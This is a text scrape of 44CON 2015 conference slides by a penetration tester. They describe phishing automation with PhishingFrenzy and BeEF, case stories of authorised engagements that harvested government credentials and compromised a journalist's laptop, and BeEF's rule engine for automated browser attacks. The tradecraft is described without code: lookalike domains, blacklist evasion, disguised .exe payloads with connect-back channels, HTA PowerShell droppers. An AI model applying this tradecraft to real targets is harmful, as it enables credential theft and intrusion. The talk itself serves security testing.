Dark Fairytales from a Phisherman (Vol. II)

80 %
20 %
Information about Dark Fairytales from a Phisherman (Vol. II)

Published on September 17, 2015

Author: micheleorru2

Source: slideshare.net

1. Dark Fairytales from a Phisherman (Vol. II) @antisnatchor

2. Outline •  whoami •  Fishing === Phishing •  Badass phishing at cost (almost) zero •  Fairytalessss •  the new BeEF Autorun Rule Engine •  Outro

3. whoami •  Pentester & Vuln researcher •  BeEF lead core developer •  Browser Hacker’s Handbook co-author •  44Con 2012 (I'm The Butcher, Would You Like Some BeEF?) •  (ex) Surf Casting pro fisherman •  (current) Phisherman

4. Phisherman     prepara,on  

5. Fishing === Phishing (F): Prepare bait and cast it (P): Prepare pretext, phishing strategy, and send emails (F): Wait for something interested on the bait (P): Wait for victims to click on your links, enter credentials, open/execute stuff (F): you got a big fish (P): you got a shell on the company’s CFO laptop

6. Fishing === Phishing

7. •  End-users are sometimes more stupid than saltwater fishes –  Fishes do evolve: you have to use smaller hooks and Fluorocarbon lines for increased stealth –  Humans apparently do not evolve: we’re doing phishing with 15 years old attacks that still work •  MS Office macros •  HTA files •  Custom .exe files Fishing === Phishing

8. Badass phishing at cost (almost) zero •  If you do phishing, you know that: – Every time it’s a different story – Configuration overhead sometimes is a killer – You can identify repeatable patterns – You need automation – Speed is key once you got access to victims assets

9. Badass phishing at cost (almost) zero •  Meet PhishLulz – phishing automation in Ruby •  Puts together PhishingFrenzy + BeEF on a dedicated Amazon EC2 image – Cheers @zeknox for creating PF !!!

10. •  Current features: –  Mass mailing with HTML templates (SET… LOL) –  Highly configurable template system –  HTTP/HTTPS support, Credential harvesting –  BeEF integration •  Correlate victim name/email with OS/browser fingerprinting including geolocation •  Automate client-side attacks via the new BeEF ARE –  Reporting Badass phishing at cost (almost) zero

11. •  What is left to the consultant as a manual step: –  Register and configure new domain if (provider !== NameCheap). •  One of the few providers with a RESTful API (still sucks) –  Eventually creating/modifying a phishing template or client-side vector –  Wait for browser hooks, harvested credentials and shells Badass phishing at cost (almost) zero

12. •  Amazon advantages: –  domain/IP blacklisted? –  Fixed with 2 steps: •  Reboot the AWS instance •  Update the A record for your main phishing domain –  Good IP block reputation –  Cheap, zero maintenance •  T2.small -> 0.026$/hours -> 0.6$/day -> 3.12 $/ 5days Badass phishing at cost (almost) zero

13. Fairytale 1 (s/lulz/real_target_name/) •  Target: www.lulz.wa.gov.au (GMT+8) – Discovered during reconnaissance: •  Webmail.lulz.com: Outlook WebAccess •  Vpn1.lulz.com: Checkpoint SSL VPN – OWA template (phishing + email pretext) available in PF – Registered lulz-wa-gov-au.com (note dashes instead of dots)

14. •  Started campaign with 46 targets at 13:30 target time Fairytale 1

15. •  Started campaign with 46 targets at 13:30 target time Fairytale 1

16. •  In less than 3 hours (by 5PM COB in the target timezone): 39% success rate Harvested credentials Domain credentials VPN credentials Fairytale 1

17. Fairytale 1

18. Fairytale 1

19. •  Results: –  Gov network compromised (including AD) Blackbox client internal External side network Access attack access –  Overall time spent: •  4 hours preparation/recon •  2 days harvesting/pwning –  Total cost: •  About 2 $ for the EC2 cost •  About 8 $ for the domain registration 10 $ total cost Fairytale 1

20. •  Results: –  Gov network compromised (including AD) –  Pure blackbox -> client-side -> internal pentest –  Overall time spent: •  4 hours preparation/recon •  2 days harvesting/pwning –  Total cost: •  About 2 $ for the EC2 cost •  About 8 $ for the domain registration 10 $ total cost Fairytale 1

21. •  The Telegraph UK asked us to target a specific journalist (Sept 2014). Info provided: –  Name: Sophie Curtis –  Not much info from reconnaissance –  Target writes about IT stuff, breaches, and so on –  Together with a brazilian friend of mine we did the engagement •  You will not find our names here: http:// www.telegraph.co.uk/technology/internet- security/11153381/How-hackers-took-over-my- computer.html Fairytale 2

22. •  Attack plan: – Generic LinkedIn invite phishing campaign •  Aim: profile the journalist OS/browser/ plugins with BeEF •  Aim 2: detect mail provider/tech – After fingerprinting, 3 client-side attacks options 1.  Custom encoded .exe inside password encrypted .rar 2.  Word document with Powershell macro 3.  HTA attack targeted to Internet Explorer Fairytale 2

23. •  LinkedIn attack (template in PF): •  This still works, but LinkedIn Changed the mail look&feel, and also the auth behavior… Fairytale 2

24. •  OS, browser and plugin fingerprint via BeEF – Note: Office 2012, Java 1.7u51, Citrix ICA Client Fairytale 2

25. •  Credible Pretext (snip 1/2): Fairytale 2

26. •  Credible Pretext (snip 2/2): Fairytale 2

27. •  Via the initial fingerprinting we identified that the victim was using Gmail for Business –  Encrypted .zip is not an option, filename leak –  “Good” antispam/AV –  Phishing domain with SPF/DKIM –  Encrypted .rar with custom .exe inside Fairytale 2

28. •  Payload: – .exe file with 3 connect-back mechanisms •  Reverse https •  Reverse DNS •  OOB extrusion via Outlook profile – Custom encoding – Adobe PDF modified icon + long Win filename trick – Custom MsgBox with PDF icon (msg: “Adobe Reader could not open xxx.pdf”) Fairytale 2

29. •  The victim believed in the pretext, she even replied back once double clicked the payload asking for more clarification •  Camera/microphone access. Game over Fairytale 2

30. •  Plan-B was ready in case of Plan-A failure Fairytale 2

31. •  Plan-B was ready in case of Plan-A failure Fairytale 2

32. PhishingFrenzy + BeEF FTW •  PhishLulz phishing with BeEF ARE video demo

33. •  If you do phishing, you know that: – Every time it’s a different story – Configuration overhead sometimes is a killer – You can identify repeatable patterns – You need automation – Speed is key once you got access to victims assets Badass phishing at cost (almost) zero. Once Again!

34. Autorun Rule Engine •  Released to public in end of July 2015 •  Define rules to trigger module(s) if certain conditions are matched, with two execution modes – Sequential – Nested-forward

35. Autorun Rule Engine •  Sequential –  Call N modules with specified inputs and different delays via setTimeout() •  Nested-forward –  Call N modules with specified inputs. –  Module N is executed only if N-1 return a certain status. Module N can use as input the output from module N-1 (eventually mangling it before processing it)

36. Autorun Rule Engine Nested-forward

37. Autorun Rule Engine Nested-forward

38. Autorun Rule Engine Nested-forward

39. Autorun Rule Engine Nested-forward

40. Autorun Rule Engine Nested-forward

41. •  Match – Browser type, version – OS type, version – (WIP) Plugin type/version •  Trigger – If (browser == IE && os >= Windows 7) •  Powershell stuff (HTA) – If (browser == FF && os == Linux) •  Firefox fake notification + extension dropper (Linux payload) Autorun Rule Engine

42. •  Sequential mode: •  Call hta_powershell with 0.5 seconds delay, after displaying the fake notification bar with custom text) Autorun Rule Engine

43. •  Fake notification and HTA powershell rule (and Avast Premium AV lol) video Autorun Rule Engine

44. •  Nested-forward mode: –  Fingerprint internal network using hooked browser internal IP for subnet mapping. •  no IP is returned (i.e.: WebRTC disabled)? –  don’t run the fingerprinting. Autorun Rule Engine

45. •  Get internal IP via WebRTC bug, then fingerprint internal network Autorun Rule Engine

46. •  RESTful API for it – Load rules at BeEF startup, or add them at runtime •  Example: you notice many new hooked browsers, and you don’t have any pre- loaded rules for them yet. – Once new rule is dynamically loaded, trigger it •  Of course only on hooked browsers matching the rule Autorun Rule Engine

47. •  Missing plugin notification dropper and Pretty Theft with windows theme Autorun Rule Engine

48. •  How I imagine the usage of BeEF ARE: – Write rulesets to cover most of your client-side exploitation needs – Have 2/3 rules for each browser, at least – Use beef.browser.isX() to detect browser and plugins, then launch appropriate Metasploit module (latest Flash??) – Have generic rules without payload droppers Autorun Rule Engine

49. •  How I imagine the usage of BeEF ARE: – Get internal IP via WebRTC bug (C/FF), scan internal network, blindly launch cross-origin ShellShock requests and have your listeners ready – Have PF Phishing campaign pre- configured for specific phishing scenario with BeEF ARE rules pre- loaded and ready to trigger as soon as email is received Autorun Rule Engine

50. More on BeEF •  @byt3bl33d3r talk tomorrow, 14:00 MITMf: Bringing Man-In-The-Middle attacks to the 21'st century – See how you can inject the BeEF hook in MITM situations, leveraging the new ARE. – Detect OS/architecture more reliable via network fingerprint, then feed back to BeEF ;-)

51. PhishingFrenzy + BeEF FTW …  BTW  That’s  not  the  ISIS  black  flag,  just  BeEF  offline  browsers  …  

52. Outro Hope you enjoyed the dark fairytales!

Add a comment

Related pages

Dark Fairytales from a Phisherman (Vol.II) presented by ...

Contact Us Address: 44CON, Sense/Net Ltd, Unit 42, 94 Fulham Palace Rd, London, W6 9PL Email: 44con@44con.com
Read more

44CON LONDON 2015: Schedule

Get listed in the directory. Watch a tour video → 44CON LONDON 2015
Read more

44CON LONDON 2015: Grid

Dark Fairytales from a Phisherman (Vol.II) 44CON LONDON 2015 afternoon tea. A Trek to the Emerald City: Ring -1 Based AV. Reverse engineering and ...
Read more

Dark Fairy Tales Revisited: volume II by Horrified Press ...

Buy Dark Fairy Tales Revisited: volume II by Horrified Press ... Visit the Lulu Marketplace for product details, ratings, and reviews. Login/Register
Read more

Download Producer Loops Symphonic Series Vol 6: Dark Fairy ...

'Symphonic Series Vol 6: Dark Fairy Tales' expands on this high end series with five original compositions supplied in Construction Kit format. ... (ii ...
Read more

Isithran (@isithran) | Twitter

... more stupid than fishes" phishing at #44con by @antisnatchor http://www. slideshare.net/micheleorru2/d ark-fairytales-from-a-phisherman-vol-ii ...
Read more